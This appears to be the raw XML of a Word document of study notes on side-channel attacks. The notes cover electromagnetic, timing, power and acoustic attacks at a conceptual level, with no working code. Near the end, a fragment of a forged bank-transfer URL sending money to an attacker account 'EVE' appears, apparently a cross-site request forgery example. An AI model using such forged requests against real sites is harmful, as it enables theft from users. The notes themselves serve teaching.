    <w:p w14:paraId="6F4B6775" w14:textId="5EB9B131" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BF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Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF981E" w14:textId="1A5B94EE" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5BFA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Side-channel attack is any atta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ck based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326B079" w14:textId="419F2378" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Becoming a bigger thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120889D" w14:textId="63629808" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5B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Better measuring equipment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586F65B6" w14:textId="41A0A998" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5B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Greater computing power</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9700BD" w14:textId="3AB79ACF" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5B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Machine learning to extract information from raw data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BABA1D" w14:textId="6112B38B" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BF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Electromagnetic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257EC79F" w14:textId="7E5F9524" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Measure the electromagnetic radiation, or radio waves, given off by a target device to reconstruct the internal signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E97EF0" w14:textId="272BDB88" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Used in the past to reconstruct images from CRT monitors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891B62A" w14:textId="2F9C1CBE" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Steal AES encryption key from up to one meter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13076F48" w14:textId="532B8CA5" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BF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Timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BF7D1E" w14:textId="54494EFC" w:rsidR="00FF5BFA" w:rsidRDefault="00FF5BFA" w:rsidP="00FF5BFA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Attacks based on measuring how much time various computations take to </w:t>
      </w:r>
      <w:r w:rsidR="004004CA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B67F9D5" w14:textId="7664775F" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="00FF5BFA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Password check, comparing character by character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744619D" w14:textId="479BFD83" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="00FF5BFA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Observing how long it takes to perform cryptographic operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46597896" w14:textId="3E80BC50" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="00FF5BFA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Some timing attacks are even proven to work across networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC50F0B" w14:textId="508EB465" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Power consumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB670D" w14:textId="338BBCD6" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Cryptography is energy intensive, and that energy can be measured and analysed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D81F02" w14:textId="62C39E73" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Proven to recover keys from RSA, AES, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A29C37" w14:textId="0279FDF1" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0FC8CA" w14:textId="0196B6BE" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DED5AD6" w14:textId="0EECBEBD" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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>Acoustic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E1A39" w14:textId="3F51774C" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Attack sound that is generated during computing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335A6DF6" w14:textId="73CCE22D" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Attack sound from external factors (e.g., keyboard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160DCB4A" w14:textId="64FB9A4F" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Successful attack against a laptop running a version of GnuPG (an RSA implementation) using a mobile phone located to the laptop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371EC1F" w14:textId="205C62A5" w:rsidR="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Successful attack using a neural network against keyboard acoustic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13411D13" w14:textId="331301A3" w:rsidR="004004CA" w:rsidRPr="004004CA" w:rsidRDefault="004004CA" w:rsidP="004004C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Successful attack against printers</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004004CA" w:rsidRPr="00400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890"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21263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021"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FDAB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E5D29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="808AA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561B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49526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0E2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F3AF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60DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09008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2D9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0FC6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3A8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89480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12A43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15EC6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2F5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EC47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64340"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="763A1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14683"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B06A8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F035B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFF22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7872">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="182133607">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1202284216">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1595628561">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="137655100">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="253367885">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1402481500">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="824860597">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1534808551">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1767310117">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1951039373">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1876578799">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1165702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D8"/>
    <w:rsid w:val="00284891"/>
    <w:rsid w:val="004004CA"/>
    <w:rsid w:val="008333F9"/>
    <w:rsid w:val="00AC101C"/>
    <w:rsid w:val="00CE72D8"/>
    <w:rsid w:val="00D704CA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EBCD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EDBAEB5A-5025-4EB6-B397-3CFA3604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04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04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04C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7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nk.com/transfer.do?acct=EVE&amp;amount=100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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-16T13:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-16T14:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>